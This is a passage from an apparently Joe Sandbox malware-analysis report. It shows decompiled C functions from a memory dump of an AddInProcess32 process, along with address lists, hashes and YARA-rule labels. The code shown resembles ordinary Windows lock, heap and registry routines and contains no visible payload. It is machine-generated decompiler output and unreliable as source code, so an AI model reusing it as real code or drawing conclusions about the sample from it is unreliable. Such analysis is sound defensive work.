									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0189006A(0x1948608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1948608);
												E0189B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1946904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1946e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0186FFB0(_t198, _t240, 0x1948608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E018900C2(0x1948608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x018820a0
0x018820a8
0x018820ad
0x018820b3
0x018820b8
0x018820c2
0x018820c7
0x018820cb
0x018820d2
0x01882263
0x01882266
0x018c5836
0x018c5836
0x00000000
0x0188226c
0x0188226c
0x01882270
0x01882274
0x018820e2
0x018820e2
0x018820e6
0x018820ee
0x018c57dc
0x018c57de
0x018c57ec
0x018c57ec
0x018c57f1
0x018c57f3
0x018c57f8
0x00000000
0x018c57f8
0x018c57e0
0x018c57e4
0x018c57ea
0x00000000
0x00000000
0x00000000
0x018c57ea
0x018820f4
0x018820f4
0x018820f8
0x018820f8
0x018820fc
0x01882100
0x01882106
0x01882201
0x01882206
0x0188220b
0x0188220e
0x018822a9
0x018822ac
0x00000000
0x00000000
0x018822b2
0x018822b5
0x018c5801
0x018c5806
0x00000000
0x00000000
0x018c5810
0x018c5815
0x018c5818
0x00000000
0x00000000
0x018c581e
0x018822bb
0x018822bb
0x01882218
0x01882218
0x0188221c
0x01882220
0x01882222
0x018822c2
0x018822c4
0x018822dc
0x018822dc
0x018822e1
0x00000000
0x00000000
0x00000000
0x018822e7
0x018822c8
0x018822cd
0x018822d3
0x018822d6
0x018c5823
0x018c5825
0x018c5827
0x00000000
0x00000000
0x018c582d
0x00000000
0x018c582d
0x00000000
0x01882228
0x01882228
0x00000000
0x01882228
0x01882222
0x01882214
0x01882214
0x00000000
0x01882114
0x01882114
0x01882114
0x0188211a
0x0188211c
0x01882348
0x0188234d
0x018c5840
0x018c5845
0x018c5848
0x018c584e
0x018c584e
0x018c5848
0x01882353
0x01882355
0x01882388
0x01882388
0x01882368
0x0188236a
0x0188236c
0x0188238f
0x00000000
0x0188236e
0x0188236e
0x0188218e
0x0188218e
0x01882191
0x01882195
0x018c5a03
0x018c5a06
0x018c5a0c
0x018c5a0f
0x018c5a11
0x018c5a13
0x018c5a13
0x018c5a19
0x018c5a1f
0x00000000
0x0188219b
0x0188219b
0x018821a0
0x01882282
0x01882284
0x01882284
0x01882284
0x01882284
0x018821a6
0x018821a9
0x018821ac
0x018821ae
0x018821b3
0x0188228b
0x01882290
0x01882379
0x01882296
0x01882298
0x01882298
0x01882290
0x018821b9
0x018821be
0x018822a2
0x018822a2
0x018821c4
0x018821c8
0x018821cc
0x018821d0
0x018821d4
0x018821de
0x018821e3
0x018c5a29
0x018c5a2c
0x00000000
0x00000000
0x018c5a3b
0x00000000
0x018821e9
0x018821e9
0x018821e9
0x018821ee
0x018821f1
0x018c5a45
0x018c5a4b
0x018c5a52
0x018c5a58
0x018c5a5d
0x018c5a5f
0x018c5a71
0x018c5a61
0x018c5a6a
0x018c5a6a
0x018c5a76
0x018c5a79
0x018c5a7f
0x018c5a83
0x018c5a85
0x018c5a87
0x018c5a87
0x018c5a8c
0x018c5a91
0x018c5a97
0x018c5a9f
0x018c5aa0
0x018c5aa1
0x018c5aa6
0x018c5aab
0x018c5ab1
0x018c5ab3
0x018c5ab9
0x018c5aca
0x018c5ad4
0x018c5ad4
0x018c5ade
0x018c5ade
0x018c5aab
0x018c5a79
0x018c5a52
0x018821f7
0x018821f9
0x018821fe
0x018821fe
0x018821e3
0x01882195
0x0188236c
0x01882122
0x01882122
0x01882124
0x01882231
0x01882236
0x01882236
0x01882238
0x01882238
0x01882240
0x01882242
0x01882244
0x018c59fc
0x0188218c
0x0188218c
0x00000000
0x0188218c
0x0188224a
0x0188224f
0x01882256
0x01882304
0x01882309
0x0188230f
0x0188231e
0x0188231e
0x0188231e
0x01882320
0x01882325
0x0188232a
0x0188232c
0x0188233e
0x0188233e
0x00000000
0x0188232c
0x01882311
0x01882317
0x0188231a
0x0188231c
0x01882380
0x01882380
0x01882380
0x01882384
0x00000000
0x00000000
0x01882386
0x00000000
0x0188231c
0x0188225c
0x0188225c
0x00000000
0x0188225c
0x0188212a
0x01882134
0x01882138
0x0188213d
0x018c5858
0x018c5863
0x018c5863
0x018c5867
0x018c586a
0x00000000
0x00000000
0x018c586c
0x018c586c
0x018c5871
0x018c5875
0x018c5877
0x018c5997
0x018c599c
0x018c59a1
0x018c59a7
0x018c59a7
0x00000000
0x018c59a7
0x018c587d
0x00000000
0x018c588b
0x018c588b
0x018c5890
0x018c5892
0x018c5894
0x018c5899
0x018c589b
0x018c58a0
0x018c58a0
0x018c58aa
0x018c58b2
0x018c58b6
0x018c58be
0x018c58c6
0x018c58c9
0x018c590d
0x018c5917
0x018c591a
0x018c591c
0x018c5920
0x018c5928
0x018c592a
0x018c592c
0x018c592e
0x018c592e
0x018c58cb
0x018c58cd
0x018c58d8
0x018c58e0
0x018c58f4
0x018c58fe
0x018c58fe
0x018c593a
0x018c593e
0x018c5940
0x018c5942
0x00000000
0x018c5944
0x018c5944
0x018c5949
0x018c594e
0x018c594e
0x018c5953
0x018c595b
0x018c5976
0x018c5976
0x018c597a
0x018c597f
0x00000000
0x00000000
0x00000000
0x00000000
0x018c5981
0x018c5981
0x018c5981
0x018c5983
0x018c5988
0x018c598d
0x018c5991
0x018c5991
0x00000000
0x018c595d
0x018c595d
0x018c5963
0x018c5965
0x00000000
0x00000000
0x00000000
0x00000000
0x018c5967
0x018c5967
0x018c596b
0x018c596d
0x00000000
0x00000000
0x018c596f
0x018c5971
0x018c5971
0x018c5974
0x00000000
0x00000000
0x00000000
0x018c5974
0x00000000
0x018c5967
0x018c595b
0x018c5942
0x018c5863
0x01882143
0x01882143
0x01882149
0x0188214f
0x018822f1
0x018822f6
0x00000000
0x01882173
0x01882173
0x0188217d
0x01882181
0x01882186
0x018c59ae
0x018c59b2
0x018c59b5
0x018c59b7
0x018c59ba
0x018c59cd
0x018c59d1
0x018c59d5
0x018c59d9
0x018c59db
0x00000000
0x00000000
0x018c59dd
0x018c59dd
0x018c59e1
0x018c59e4
0x018c59e7
0x018c59ee
0x018c59ee
0x018c59f3
0x018c59f3
0x00000000
0x01882186
0x0188214f
0x01882106
0x01882266
0x018820d8
0x018820da
0x018820e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0f76883544f2d0869014b933d1706d93667ebfa2e11090d605dba76c7cdb944
Instruction ID: 20c89de927e5d1b0a913c4b816778ff9892fa039550da58a88910897197be361
Opcode Fuzzy Hash: d0f76883544f2d0869014b933d1706d93667ebfa2e11090d605dba76c7cdb944
Instruction Fuzzy Hash: 90F127357083019FDB26DF2CC440B6BBBE2AF85728F14855DE999DB291D734EA41CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0186849B Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0186849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x192f9c0);
				E018AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1947b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0186CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E01872280( *[fs:0x30], 0x1948550);
						_t139 =  *0x1947b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0188F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0186FFB0(_t193, _t235, 0x1948550);
								L5:
								return E018AD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E01851C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1947b9c; // 0x0
							_t235 = L01874620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1947b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0188A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0186FFB0(_t193, _t235, 0x1948550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L018777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L018777F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1947b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1947b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E018937C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1947b9c; // 0x0
									_t214 = L01874620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E018937F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1947b10 =  *0x1947b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1947b04 =  *0x1947b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L018777F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L018777F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1947b08 =  *0x1947b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E018957C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0189F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L018777F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0188A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L018777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E018996C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x0186849b
0x0186849b
0x0186849b
0x0186849b
0x0186849d
0x018684a2
0x018684a7
0x018684b1
0x018684d8
0x00000000
0x018684b3
0x018684c4
0x018684c9
0x018684cd
0x018684cf
0x018684cf
0x018684d6
0x018684e6
0x018684e9
0x018684ec
0x018684ef
0x018684f2
0x018684f4
0x018684fc
0x01868501
0x01868506
0x01868509
0x018686e0
0x018686e5
0x018686e8
0x018686ed
0x018686f0
0x018686f2
0x018b9afd
0x018b9b02
0x018684da
0x018684df
0x018684df
0x018686fa
0x018686fd
0x018686fe
0x01868701
0x01868706
0x01868709
0x0186870b
0x00000000
0x00000000
0x01868711
0x01868725
0x01868727
0x0186872a
0x0186872c
0x018b9af0
0x018b9af5
0x01868732
0x01868732
0x01868732
0x01868735
0x01868737
0x01868515
0x01868515
0x01868518
0x0186851d
0x01868523
0x01868527
0x0186852b
0x01868537
0x01868539
0x0186853c
0x0186853e
0x0186868c
0x01868691
0x01868699
0x0186869b
0x01868744
0x01868748
0x018686a1
0x018686a1
0x018686a1
0x018686a4
0x018686a8
0x018b9bdf
0x018b9bdf
0x018686ae
0x018686b0
0x00000000
0x018686b6
0x00000000
0x018b9be9
0x018686b0
0x01868544
0x0186854a
0x0186854d
0x01868551
0x0186876e
0x01868778
0x0186877b
0x01868780
0x01868557
0x01868557
0x0186855d
0x0186855d
0x0186856b
0x0186856e
0x01868570
0x01868573
0x01868576
0x01868576
0x01868579
0x0186857b
0x00000000
0x00000000
0x01868581
0x018685a0
0x018685a2
0x018685a5
0x018685a7
0x018b9b1b
0x018b9b1b
0x0186862e
0x0186862e
0x01868631
0x01868631
0x01868634
0x01868636
0x01868669
0x01868669
0x0186866b
0x018b9bbf
0x018b9bc4
0x018b9bc8
0x018b9bce
0x018b9bce
0x01868671
0x01868671
0x01868674
0x01868676
0x018b9bae
0x018b9bae
0x01868676
0x0186867c
0x0186867e
0x01868688
0x01868688
0x00000000
0x0186867e
0x01868638
0x01868638
0x0186863b
0x0186863e
0x0186863f
0x01868642
0x01868645
0x01868648
0x0186864d
0x018b9b69
0x018b9b6e
0x018b9b7b
0x018b9b81
0x018b9b85
0x018b9b89
0x018b9ba7
0x018b9b8b
0x018b9b91
0x018b9b9a
0x018b9b9f
0x018b9b9f
0x01868788
0x0186878d
0x01868763
0x01868763
0x01868766
0x00000000
0x01868766
0x018b9b70
0x00000000
0x018b9b70
0x01868656
0x0186865a
0x0186865c
0x01868752
0x01868756
0x00000000
0x00000000
0x0186875e
0x00000000
0x0186875e
0x01868662
0x01868662
0x01868662
0x01868666
0x00000000
0x01868666
0x018685b7
0x018685b9
0x018685bc
0x018685bf
0x018685cc
0x018685d1
0x018685d4
0x018685db
0x018685de
0x018685e0
0x018b9b5f
0x00000000
0x018b9b5f
0x018685e6
0x018685ea
0x018686c3
0x018686c5
0x018686c8
0x018686ca
0x018b9b16
0x00000000
0x018b9b16
0x018686d6
0x018685f6
0x018685f6
0x018685f9
0x01868602
0x01868606
0x0186860a
0x0186860b
0x0186860e
0x01868611
0x00000000
0x01868611
0x018685f3
0x00000000
0x018685f3
0x01868619
0x0186861e
0x0186861e
0x01868621
0x01868622
0x01868623
0x01868625
0x0186862c
0x00000000
0x0186873d
0x00000000
0x0186873d
0x01868737
0x0186850f
0x01868512
0x00000000
0x01868512
0x00000000
0x018684d6

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1615cde47f398d58f2678be38c565d288b5512b7d89fff76ce1ffd962aa32d45
Instruction ID: 61ea88a054206005529e40e9e0a8bb948366ea7d13700fd95c74c563c293bb35
Opcode Fuzzy Hash: 1615cde47f398d58f2678be38c565d288b5512b7d89fff76ce1ffd962aa32d45
Instruction Fuzzy Hash: 7DB13BB4E00359DFDB15DFD9C984AADBBB9BF49308F104129E609EB345DB70AA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0185C600 Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0185C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x194d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E01866D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0189B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1947b9c; // 0x0
					_t74 = L01874620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E01899650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L018777F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0189F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E018913C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L018777F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E01899650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x0185c608
0x0185c615
0x0185c625
0x0185c62d
0x0185c635
0x0185c640
0x0185c680
0x0185c687
0x0185c688
0x0185c689
0x0185c694
0x0185c694
0x0185c642
0x0185c64a
0x0185c697
0x018c7a25
0x018c7a2b
0x018c7a2e
0x018c7a30
0x018c7bea
0x018c7bea
0x00000000
0x018c7bea
0x018c7a36
0x018c7a43
0x018c7a48
0x018c7a4c
0x018c7a4e
0x00000000
0x00000000
0x018c7a58
0x018c7a5a
